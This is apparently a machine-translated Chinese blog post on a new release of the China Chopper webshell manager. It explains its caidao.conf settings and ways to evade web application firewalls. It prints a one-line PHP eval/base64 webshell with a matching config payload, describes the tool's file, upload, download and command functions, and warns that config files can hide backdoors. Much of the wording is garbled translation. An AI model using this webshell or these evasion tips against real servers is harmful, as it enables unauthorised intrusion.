The coolest chopper ever.

June 17, a cow in the circle of friends sent a message:

The most awesome Chinese kitchen knife to be released soon, over all the WAF on the market, and play Webshell to make you jaw-dropping realm

There was news that a new version of the chopper would be released at the end of June.

Sure enough, on June 20, the original closed maicaidao.com is open again, and download the amount of instant to 660 +.

Words don't say much, hurry to download a experience a wave of how great.

The article was released when the site was closed again, the specific reason is unknown. (Pulse SP Small NOTE: it should be DDoS)

The Pulse of the small series looked at the Whois change, think should still be veteran works. Related reading "Red version of Chinese kitchen Knife (20141213) Official release", "Chinese kitchen knife Counterfeit official website 3 million box burst chrysanthemum kee"

Note: The only official website of the chopper is:www.maicaidao.com

Unzip after download, password iswww.maicaidao.com

The specific information sources refer to the extracted Readme.txt.

Document description

Caidao.exe Chopper Program

master database of Db.mdb Chopper

caidao.conf configuration file (important, don't delete)

CACHE.TMP Chopper Cache Database (can be deleted)

Readme.txt Description document (can be deleted)

Ip.dat an IP library for IP address recognition (can be deleted)

CCC Chopper's self-writing script directory (can be deleted)

Service side of Customize mode (can be deleted)

We can find that the new version of the main is more caidao.conf, this configuration file, the author of this file's own evaluation is "important, do not delete." And pills June feel this seemingly small change, even can let Chinese kitchen knife back to the dead, second over the WAF.

We know that the source code of the chopper is not public, since the end of the update, all kinds of WAF on its data packet three layer outside the three layer analysis. In those days, to be able to do the WAF, there are usually the following methods:

1. A word over a WAF. By morphing, confusing a word Webshell escaped check. (then the WAF that analyzed the request)

2. decompile modifies the bundle feature over the WAF. The cost of this method is relatively high, you have to reverse it, and then there is an embarrassing problem is that you can change the place is really limited.

3. Transit Scripts modify packets over WAF. This method should be used with a kitchen knife over the WAF with the most and convenient. But you have to open a relay Web service, and my embarrassment has been made again.

It is because there are many inconvenience, and the kitchen knife itself can not cross the platform, in recent years, open-source Webshell management tools emerge, the typical pill friend ant meet unexpectedly developed Antsword (Chinese ant sword), using Nodejs and ES6 development, cross-platform, and open source. As well as Altman, using C + + development, supporting cross-platform, source code has also been open source on GitHub. and Java-developed open source Webshell management software Cknife. There's quite a lot of software like that.

All right, let's have a look at the caidao.conf with the pills.

caidao.conf

Yes, I have to explain beforehand, the kitchen knife can cross the premise of the WAF, you need to change these configurations, otherwise, you can only be rusty kitchen knives.

1. <FLAG>

Returns the content delimiter, which is limited to three characters. We know the original separator is->|. With |<-, some WAF will intercept this character, so we can use the character of the birth point, such as ~>$.

2. <UA>

Customizing the user-agent part of the HTTP request, we see that the default caidao.conf will change UA to the UA of Baidu Spider, and of course you can change it to Google. Sometimes it needs to be changed, and in most cases this parameter is not changed.

3. <K1> and <K2>

The parameter name of the post, by default, K1 is Z1,k2 is Z2. In general, WAF doesn't stop this, so you don't have to change it.

4. <php_base>, <asp_base>, <aspx_base>, <php_base. encryption Example >

These 4 are the basic code parts of Webshell, all the function code will be sent here to assemble, and then sent to the server.

If your server Webshell do a layer of decryption operations, such as the server-side code is like this

<?php @eval (Base64_decode ($_post[' Caidao '));? >

Then, you can modify the configuration to

<php_base. Encryption Example >eval (Base64_decode ($_post[id)); &id=%s</php_base. encryption Example >.

Can be responsible for speaking, avoid killing, most of the WAF is here to do the article, the basic is a number of functional functions, WAF is generally not killed, if he dared to kill, he proved that his business does not need that kind of operation.

Here is interesting, you think, the former kitchen knife only a base64_decode that now, you can casually change, for example, you use Hex, again such as you can use Caesar password, or fence password, then excessive point, you can use AES, DES, The most outrageous thing is to write a cryptographic decryption algorithm. That's embarrassing for a WAF to stop. (the author said that the WAF is probably the meaning of this layer)

5. <GETBASEINFO>

Gets the functional code for the underlying information. For example, you add the shell, go directly to the virtual terminal, a go in will show the current path, the current user, system type what these.

6. <SHOWFOLDER>

File directory to view the function code. This is mainly the user to pass in a path, and then the directory under this path, the files are all displayed, including some attributes, such as file time, permissions, types and so on.

7. <SHOWTXTFILE>

View the contents of the file, edit the file is also the first call here.

8. <SAVETXTFILE>

Save the file.

9. <DELETEFILE>

Delete the file.

Ten. <DOWNFILE>

Download the server file locally.

One. <UPLOADFILE>

Upload files to the service side.

<PASTEFILE>

Paste the file.

<NEWFOLDER>

Create a new directory.

<WGET>

Download a file from the remote to the server.

<SHELL>.

Execute the system command, here is more awkward place, is the correlation function was killed, basically is the No.

The other is some database function code, I really do not want to write, on those words, Baidu translation know what is meant, I do not translate the ha.

How to cross a WAF

Although I have mentioned some of the above WAF points, but in order to make up the number of words, I still in this system summed up.

Here we have to mention some of the characteristics of the WAF.

1. Based on the regular class WAF

This kind of waf, too good around, you can say, you do not have to change the configuration of the chopper can be done, such as you put a word base64, and then base64 a bit, this is around the past. If he checks your Request, you can just change the <PHP_BASE> here and cross the WAF like a street. Such WAF such as the xxx dog.

2. The WAF based on hook mechanism

For example, in PHP, functions such as Eval, Create_function, Preg_replace, assert, and so on that can execute strings in script code go through the API compile_stringof the scripting layer.

This kind of WAF hooks this API from the bottom, and if there is a script that calls the API, go straight to the dead and do not explain. normally the normal site will not use these features, if there is really, then go white list on the line. So how do you get through this WAF in one sentence? What do you want to do, and you want to use a sentence? unless ... You can dig a PHP local code to execute the vulnerability, then you directly on the remote control on the line and a word?

So how do you use a kitchen knife for this kind of WAF? CUSTOM type Yes. CUSTOM type of Webshell, you can fully understand as a big horse. Just input and output with a chopper to parse it. At this time some function code is directly on the server side, so do not go through the compile_string API, so it can be used normally. But if you want to execute the system command, that's another thing. Ahahaha, again, this feature is supported by the old version of the chopper. This type of WAF is typically like D-shield.

To summarize, so the WAF is divided into two categories, one is casual, one is too much,:).

about the kitchen knife back door

Since the kitchen knife has been exposed to the back door, most people no longer believe in love. It's horrible, black eats black. This is why many people abandon the use of Chinese kitchen knives to develop their own webshell management tools.

After a cow has been tested, there are several recent historical versions of the chopper hash with no back door:

Files: Caidao-20100928.exe

Size: 200192 bytes

md5:c05d44dbe353525f492208d891b53875

Files: Caidao-20111116.exe

Size: 220672 bytes

md5:5001ef50c7e869253a7c152a638eab8a

Files: Caidao-20141213.exe

Size: 220160 bytes

md5:4b4a956b9c7dc734f339fa05e4c2a990

This time the chopper will use the configuration file form for all the package functions, which in large part solves the problem of backdoor.

Yes, in the future you want to ask for the kitchen knife of xxx, do not need to copy the whole file, directly to a XXX configuration file on the line.

So the question is, is there really no back door?

Obviously not.

Can eliminate the kitchen knife main program No back door, but, configuration file inside can do a little hands and feet ah .

Let me give an example, for example, I add a backdoor code to <wget> , and when you execute wget, the shell message is sent to my backdoor server.

You will say, who has such a silly force ah, a look on it.

Is that really the case?

To be reasonable, most of the security practitioners will not write code, those who ask for the xxx knife, even the simple regular over the WAF and so on, you also expect him to understand how many lines of code. Plus coding confusing what, the picture is too beautiful I dare not think.

The former chopper, in order to add the back door, have to reverse add, and limited by the length, now use the configuration file, add back door what, more convenient, also more difficult to check.

The coolest chopper ever.